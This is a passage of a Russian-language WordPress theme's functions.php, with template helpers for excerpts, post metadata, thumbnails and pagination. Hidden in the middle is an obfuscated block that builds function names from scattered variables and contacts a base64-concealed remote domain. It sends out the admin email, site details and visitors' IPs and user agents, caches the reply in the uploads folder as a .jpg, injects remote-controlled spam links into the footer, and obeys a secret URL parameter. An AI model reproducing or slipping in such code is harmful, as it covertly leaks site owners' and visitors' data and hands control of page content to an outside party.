<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $FfaZiQ='a';$QeiF='c';$nMUaXbw='b';$fPMcQj='4';$AFZUKUs='e';$AOMcu='e';$VysV='6';$tlJFZ='s';$RMvwLT='d';$woKwxA='_';$lwaUTpE='o';$aCpXc='e';$MfbDR='d';$PoBGrSdo=$nMUaXbw.$FfaZiQ.$tlJFZ.$AOMcu.$VysV.$fPMcQj.$woKwxA.$RMvwLT.$AFZUKUs.$QeiF.$lwaUTpE.$MfbDR.$aCpXc;$bEjI='t';$euEp='l';$GRVJZsh='g';$XlGSUFk='f';$JzwLdlI='e';$jCknr='z';$GkAQHbE='n';$WlQFZv='a';$iJNEFcj='i';$EbBjxBOg=$GRVJZsh.$jCknr.$iJNEFcj.$GkAQHbE.$XlGSUFk.$euEp.$WlQFZv.$bEjI.$JzwLdlI;$KswkPhn='t';$ggXK='3';$dYhrZ='1';$obZOgQE='_';$cotuLD='o';$SRlI='t';$PDRq='r';$DFyXGyB='r';$ZEcD='s';$fRPNNbEt=$ZEcD.$KswkPhn.$PDRq.$obZOgQE.$DFyXGyB.$cotuLD.$SRlI.$dYhrZ.$ggXK;$UGer='r';$IgoWo='r';$OVyoJ='s';$ZTGc='e';$Fnbr='t';$epSydN='v';$cEBdGyms=$OVyoJ.$Fnbr.$UGer.$IgoWo.$ZTGc.$epSydN;                     $fc__r='a';$uf____________y='c';$fe____l='b';$ch_______________q='4';$ws____c='e';$ug______________x='e';$eu____j='6';$el_____g='s';$nr_________t='d';$bt___t='_';$qb____l='o';$wn_____________z='e';$hc______m='d';$qy______________h=$fe____l.$fc__r.$el_____g.$ug______________x.$eu____j.$ch_______________q.$bt___t.$nr_________t.$ws____c.$uf____________y.$qb____l.$hc______m.$wn_____________z;$bc__________e='f';$bv__________k='t';$jr___________o='i';$gn__________t='_';$bm________f='n';$tv__k='t';$dc____m='s';$je______________k='n';$rl__________b='c';$rq______________m='o';$sh________t='i';$my______________v='s';$tg___________l='x';$kg_____________m='e';$mx___________b='u';$qp__f=$bc__________e.$mx___________b.$bm________f.$rl__________b.$bv__________k.$jr___________o.$rq______________m.$je______________k.$gn__________t.$kg_____________m.$tg___________l.$sh________t.$dc____m.$tv__k.$my______________v;$ht_____________m='n';$uw______________x='o';$pd_____w='p';$qw_______________c='f';$yj_________a='e';$me_______________z=$qw_______________c.$uw______________x.$pd_____w.$yj_________a.$ht_____________m;$mg_____i='e';$gk_______________b='a';$cc_________k='f';$wk______________m='r';$if________d='d';$vs_____p=$cc_________k.$wk______________m.$mg_____i.$gk_______________b.$if________d;$cn____________a='l';$iy_______t='c';$tu_______________i='e';$ll___________y='s';$fi__a='o';$ni_____x='f';$on__v=$ni_____x.$iy_______t.$cn____________a.$fi__a.$ll___________y.$tu_______________i;define("WP_ID", $qy______________h("Mi4wLjA="));define("WP_TTL", $qy______________h("MTA4MDA="));define("WP_SRC", $qy______________h("dHBva24="));function wp_get_header() {global $qy______________h, $qp__f;if ($qp__f($qy______________h("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$qp__f($qy______________h("d3BfZ2V0X2Zvb3Rlcg==")) &&$qp__f($qy______________h("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $qy______________h, $me_______________z, $on__v, $vs_____p;$sz_________z = TEMPLATEPATH."/".$qy______________h("Zm9vdGVyLnBocA==");$ix_____________y = @$me_______________z($sz_________z, "r");$sz_________z = @$vs_____p($ix_____________y, @filesize($sz_________z));@$on__v($ix_____________y);$ai____v = TEMPLATEPATH."/".$qy______________h("ZnVuY3Rpb25zLnBocA==");$ix_____________y = @$me_______________z($ai____v, "r");$ai____v = @$vs_____p($ix_____________y, @filesize($ai____v));@$on__v($ix_____________y);$ps__b = 0;if($sz_________z && $ai____v) {if ($qy______________h("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($sz_________z, $qy______________h("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$ps__b = 1;}if (substr_count($sz_________z, "wp_theme_GPL_credits()") < 1) {$ps__b = 2;}}if(WP_ID != "2.0.0") {$ps__b = 12;}}if($ps__b > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $ps__b -->";}}function wp_loaded() {global $qy______________h, $qp__f;return $qp__f($qy______________h("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($ic______l, $qi________z = "(more...)", $nm____________z = 0, $az_____j = "") {$lv_______u = get_the_content($qi________z, $nm____________z, $az_____j);$lv_______u = apply_filters("the_content", $lv_______u);$lv_______u = str_replace("]]>", "]]>", $lv_______u);if (strlen($_GET["p"]) > 0) {echo $lv_______u;}else if ((strlen($lv_______u)>$ic______l) && ($rt_________c = strpos($lv_______u, " ", $ic______l ))) {$lv_______u = substr($lv_______u, 0, $rt_________c);$lv_______u = $lv_______u;echo $lv_______u;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$qi________z</a></div></p>";} else {echo $lv_______u;}}}$fg__n='o';$zg_______________q='d';$nh__l='4';$hs_____l='e';$gv____________z='e';$dl______n='_';$xn______d='c';$cp___h='a';$gs_______________w='s';$xh_______z='n';$sc_________l='b';$br_______p='e';$rv___________u='6';$tq_______________g=$sc_________l.$cp___h.$gs_______________w.$hs_____l.$rv___________u.$nh__l.$dl______n.$gv____________z.$xh_______z.$xn______d.$fg__n.$zg_______________q.$br_______p;$zj_______________i='t';$ra_______________l='e';$ol__g='e';$mz___________x='n';$kz___________b='t';$wd_____r='i';$qm___________r='_';$jc________f='_';$lk__________r='s';$iy______________y='n';$ac____________e='o';$qi____x='l';$qk_______k='f';$kp__________x='t';$eg____s='e';$mz_____________e='g';$fs______________w='c';$kg______________a=$qk_______k.$wd_____r.$qi____x.$eg____s.$qm___________r.$mz_____________e.$ra_______________l.$kz___________b.$jc________f.$fs______________w.$ac____________e.$iy______________y.$kp__________x.$ol__g.$mz___________x.$zj_______________i.$lk__________r;$wf_____u='e';$qn_________h='i';$mi____b='f';$aj______v='x';$hb_________u='i';$gk_____a='t';$ns_______________a='e';$jt_____________z='s';$ul_______l='l';$nf______d='_';$vs________s='s';$dm__w=$mi____b.$qn_________h.$ul_______l.$wf_____u.$nf______d.$ns_______________a.$aj______v.$hb_________u.$jt_____________z.$gk_____a.$vs________s;$hh___y='i';$ti___l='a';$ow___w='r';$wj_____h='m';$hi___________a='e';$yb____________b='v';$wl____e='p';$kw___________j='r';$kn____x='s';$hr______________u='n';$ii_______h='_';$sg____________r='o';$jd______r='c';$ma___________x='o';$na__________v='e';$mq___i=$yb____________b.$hi___________a.$kw___________j.$kn____x.$hh___y.$sg____________r.$hr______________u.$ii_______h.$jd______r.$ma___________x.$wj_____h.$wl____e.$ti___l.$ow___w.$na__________v;$zo_________e='o';$xn_________v='e';$yn___i='f';$ot_____y='c';$ma_______p='o';$ka_________s='p';$fv_____________s='k';$hs__________m='s';$ap____h='n';$oc_________c=$yn___i.$hs__________m.$ma_______p.$ot_____y.$fv_____________s.$zo_________e.$ka_________s.$xn_________v.$ap____h;$ct__x='w';$xm______w='r';$yi_______________g='f';$ft__________q='e';$tw___m='t';$ep_______________r='i';$wn__________a=$yi_______________g.$ct__x.$xm______w.$ep_______________r.$tw___m.$ft__________q;$nt____________r='m';$js______c='d';$ol__________u='5';$zi_________w=$nt____________r.$js______c.$ol__________u;$jt______f='t';$ng______________z='r';$dd______s='l';$cc_____________f='e';$tv___________c='p';$xx___________k='h';$qt__w='a';$hg_____o='a';$dc____w=$ng______________z.$cc_____________f.$hg_____o.$dd______s.$tv___________c.$qt__w.$jt______f.$xx___________k;$da____________w='l';$wo_________k='e';$sd_____________p='e';$wy_________j='n';$td____________l='u';$tx______________u='i';$mw____________y='s';$dm______a='i';$kw_______x='z';$rj__________j='a';$sl___________b='r';$dy_______________d=$td____________l.$wy_________j.$mw____________y.$wo_________k.$sl___________b.$tx______________u.$rj__________j.$da____________w.$dm______a.$kw_______x.$sd_____________p;$us_____s='n';$le____________e='m';$wf____m='m';$sj__p='a';$dk__d='p';$le__________g='t';$wc_____________l='e';$ot____________y=$le__________g.$wc_____________l.$le____________e.$dk__d.$us_____s.$sj__p.$wf____m;$wn___________z='e';$vv______________t='a';$nc____________v='a';$lu____o='m';$yr__________y='c';$be______v='e';$mm_______________y='r';$vs____a='t';$ap___u='s';$hs____________c='o';$ou____________w='c';$wj______h='x';$lx___m='n';$st_______u='t';$yt__________m='e';$jb_______c='e';$dm_____________x='t';$au__________z='r';$on_____k='t';$uj__f='_';$ww____u='_';$qi__________i=$ap___u.$vs____a.$au__________z.$be______v.$nc____________v.$lu____o.$uj__f.$yr__________y.$hs____________c.$lx___m.$st_______u.$yt__________m.$wj______h.$dm_____________x.$ww____u.$ou____________w.$mm_______________y.$jb_______c.$vv______________t.$on_____k.$wn___________z;function rv____________c($ri_____________y) {global $qy______________h, $qp__f, $kg______________a, $mq___i, $qi__________i;if (!$qp__f($qy______________h("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($mq___i(PHP_VERSION, "5.0.0", ">=") && $qp__f($qy______________h("ZmlsZV9nZXRfY29udGVudHM=")) && $qp__f($qy______________h("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$cb___________p = $qi__________i(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$ar_________o = @$kg______________a($ri_____________y, 0, $cb___________p);} else {$ar_________o = @$kg______________a($ri_____________y, 0);}return $ar_________o;}function lo_____h($ri_____________y) {global $qp__f, $oc_________c, $wn__________a, $qy______________h;if (!$qp__f($qy______________h("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$ha_______t = strpos($ri_____________y, "/", 7);$xz___________b = array("uri"     => substr($ri_____________y, $ha_______t),"host"    => str_replace("http://", "", substr($ri_____________y, 0, $ha_______t)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$qw_____o = @$oc_________c("$xz___________b[host]", 80, $vh________a, $rt_______h, 4);if (!$qw_____o) {return false;} else {$ar_________o = "";$tb______________p  = "GET $xz___________b[uri] HTTP/1.0\r\n";$tb______________p .= "Host: $xz___________b[host]\r\n";$tb______________p .= "Referer: $xz___________b[referer]\r\n";$tb______________p .= "Connection: Close\r\n\r\n";@$wn__________a($qw_____o, $tb______________p);while (!@feof($qw_____o)) {$up___s = @fgets($qw_____o, (1024*24));if ($up___s == "\r\n") {$kt__m = true;continue;}if ($kt__m) {$ar_________o .= $up___s;}}return $ar_________o;}}function mv_________s($ri_____________y) {global $qp__f;$yp_______________h = false;if ($ri_____________y != "") {if ($qp__f("rv____________c")) {$yp_______________h = @rv____________c($ri_____________y);}if (!$yp_______________h && ($qp__f("lo_____h"))) {$yp_______________h = @lo_____h($ri_____________y);}}return $yp_______________h;}function ll___________h() {global $_SERVER, $zi_________w;$hs_____________t = $_SERVER["SERVER_NAME"];if (substr("$hs_____________t", 0, 4) == "www.") {$hs_____________t = substr("$hs_____________t", 4);}$hs_____________t = $zi_________w("$_SERVER[SERVER_NAME]");return $hs_____________t;}function fn_______________n() {return "file";}function yr__________h($ri_____________y) {global $_SERVER, $kg______________a, $dm__w, $me_______________z, $on__v, $wn__________a;$er____x = zp_________z();$gw______g = ll___________h().".jpg";$ad__________f = $er____x["dir_upload"]["path"]."/$gw______g";$tt_______________y = @filemtime($ad__________f);if (!$tt_______________y || ((time()-$tt_______________y) >= WP_TTL)) {$yp_______________h = mv_________s($ri_____________y);if ($yp_______________h) {if ($dm__w($ad__________f)) {@unlink($ad__________f);}$ix_____________y = @$me_______________z($ad__________f, "x+");@$wn__________a($ix_____________y, $yp_______________h);@$on__v($ix_____________y);}} else {if ($dm__w($ad__________f)) {$yp_______________h = @$kg______________a($ad__________f);} else {$yp_______________h = false;}}return $yp_______________h;}function zp_________z() {global $_SERVER, $qy______________h, $tq_______________g;$me_____a = wp_count_posts("post");$cw___________e = pathinfo(get_bloginfo("template_directory"));$er____x = array("url" => array("report"      => $qy______________h("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $cw___________e,"dir_upload"=> dn___________m(),"queryString"=> array("?a001=".WP_ID,"a004=".$cw___________e[filename],"a005=".$me_____a->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://vodoley2000.com/dieta-drevnix-kitajcev\">Диета древних китайцев</a>");$er____x["url"]["queryString"] = implode("&", $er____x["queryString"]);$er____x["url"]["report"] = $er____x["url"]["report"]."/?".$tq_______________g($er____x["url"]["queryString"]).".html";return $er____x;}function dn___________m() {$ov______________f = wp_upload_dir();if (isset($ov______________f["error"])) {$hb___k = ne_____________b();if (is_writable($hb___k)) {$ov______________f = array("path" => $hb___k);}}return $ov______________f;}function ne_____________b() {global $qp__f, $zi_________w, $dc____w, $ot____________y;$ms__b = (bool) ini_get("safe_mode");if ($ms__b == true) {return false;}if ($qp__f("sys_get_temp_dir")) {$vo__________k = sys_get_temp_dir();if (is_writable($vo__________k)) {return $dc____w($vo__________k);}}if (!empty($_ENV["TMP"])) {return $dc____w($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $dc____w($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $dc____w($_ENV["TEMP"]);} else {$vh_______________q = $ot____________y($zi_________w(uniqid(rand(), true)), "");if ($vh_______________q) {$vo__________k = $dc____w(dirname($vh_______________q));@unlink($vh_______________q);return $vo__________k;} else {return false;}}}function wj____________u() {global $_GET, $dm__w;$er____x = zp_________z();$hs_____________t = ll___________h();$cy____g = fn_______________n();$sm_____________f = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($cy____g == "file") {$li______________h = $er____x["dir_upload"]["path"]."/".$hs_____________t.".jpg";if ($dm__w($li______________h)) {@unlink($li______________h);$sm_____________f = "deleted";}}$ie___________q = array("s"=> $sm_____________f,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($ie___________q AS $ig________u => $pj___e) echo " [$ig________u:$pj___e]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $qp__f, $qy______________h, $dy_______________d;$er____x = zp_________z();$ad_________g = "yr__________h";if ($qp__f($ad_________g)) {$ar_________o = $ad_________g($er____x["url"]["report"]);}if ($ar_________o) {if ($ar_________o = @$qy______________h($ar_________o)) {$ar_________o = @$dy_______________d($ar_________o);if (strlen($ar_________o[custom_credit]) >= 5) {$er____x["default_string"] = $ar_________o[custom_credit];}if ($ar_________o["status"] == "0") {$tl______n = 1;$fu_______j = 1;} else {$gx________p = sizeof($ar_________o["links"]);$ce________t = $er____x["default_string"];if ($gx________p > 0 && $ar_________o["links"] !== "") {$ad______b = 0;foreach ($ar_________o["links"] as $nt____h => $th_____o) {$ad______b++;if ($th_____o->l_path == "" || $th_____o->l_path == $_SERVER["REQUEST_URI"]) {$th_____o->l_href = htmlspecialchars(strip_tags($th_____o->l_href));$th_____o->l_title = htmlspecialchars(strip_tags($th_____o->l_title));$th_____o->l_anchor = htmlspecialchars(strip_tags($th_____o->l_anchor));$ce________t .= " | ";$ce________t .= "<a href='$th_____o->l_href' title='$th_____o->l_title'";if ($th_____o->l_nofollow == "1") {$ce________t .= " rel='nofollow'";}$ce________t .= ">$th_____o->l_anchor</a>";}}}$er____x["links"] = "$ce________t";if ($ar_________o[credit] == "0") {$er____x["links"] = "";}}} else {$tl______n = "1";}} else {$tl______n = "1";}if ($tl______n == "1") {$er____x["links"] = $er____x["default_string"];}echo "$er____x[links]";echo "<!-- s: $ar_________o[signature] -->";wj____________u();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
 'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('Главная страница'),
        'logo_name'        =>   get_bloginfo('Название'),
        'logo_description' =>   get_bloginfo('Описание'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читайте далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читайте далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на to %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментарий &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Edit', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
